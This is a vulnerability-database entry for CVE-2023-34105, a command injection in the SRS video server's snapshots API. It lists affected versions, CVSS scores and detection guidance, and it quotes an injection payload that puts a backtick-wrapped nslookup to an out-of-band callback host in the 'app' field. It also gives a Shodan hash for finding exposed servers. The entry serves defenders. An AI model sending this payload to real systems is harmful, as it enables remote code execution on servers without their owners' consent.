cbcvebase.
CVE-2023-34105
published 2023-06-12

CVE-2023-34105: SRS is a real-time video server supporting RTMP, WebRTC, HLS, HTTP-FLV, SRT, MPEG-DASH, and GB28181. Prior to versions 5.0.157, 5.0-b1, and 6.0.48, SRS's…

PriorityP181high7.5CVSS 3.1
AVNACHPRNUIRSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
8.76%
94.5th percentile
SRS is a real-time video server supporting RTMP, WebRTC, HLS, HTTP-FLV, SRT, MPEG-DASH, and GB28181. Prior to versions 5.0.157, 5.0-b1, and 6.0.48, SRS's `api-server` server is vulnerable to a drive-by command injection. An attacker may send a request to the `/api/v1/snapshots` endpoint containing any commands to be executed as part of the body of the POST request. This issue may lead to Remote Code Execution (RCE). Versions 5.0.157, 5.0-b1, and 6.0.48 contain a fix.

Affected

5 ranges
VendorProductVersion rangeFixed in
ossrssimple_realtime_server>= 5.0.137 < 5.0.1575.0.157
ossrssimple_realtime_server>= 6.0.18 < 6.0.486.0.48
ossrssrs< 5.0-b15.0-b1
ossrssrs
ossrssrs

Detection & IOCsextracted from sources · hover to see the quote

url/api/v1/snapshots
command{"action": "on_publish", "app": "`nslookup {{interactsh-url}}`", "stream":"foo", "vhost": "foo", "client_id":"foo"}
  • Look for POST requests to /api/v1/snapshots with a JSON body containing backtick-wrapped shell commands in the 'app' parameter — this is the injection vector for CVE-2023-34105.
  • The injection occurs specifically in the 'app' parameter of the snapshots API JSON body; monitor for shell metacharacters (backticks, $(), pipes, semicolons) in that field.
  • Use the Shodan favicon hash 1386054408 to identify exposed SRS api-server instances on the internet for proactive asset discovery.
  • Successful exploitation produces an HTTP 200 response with a JSON body containing both '"code":' and 'data":' fields; correlate with outbound DNS from the server to detect OOB command execution.
  • Affected versions are v5.0.137–v5.0.156 and v6.0.18–v6.0.47; flag SRS instances in these version ranges as high-priority targets.
  • ·The vulnerability requires user interaction (UI:R in CVSS) despite being unauthenticated; exploitation is a drive-by scenario, meaning a victim must trigger the request (e.g., via SSRF or a crafted link), not a fully autonomous server-side attack.
  • ·The vulnerable code path is in the api-server component (server.go L761), which may be a separate process/port from the main SRS media server; ensure detection coverage targets the api-server's HTTP listener specifically.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.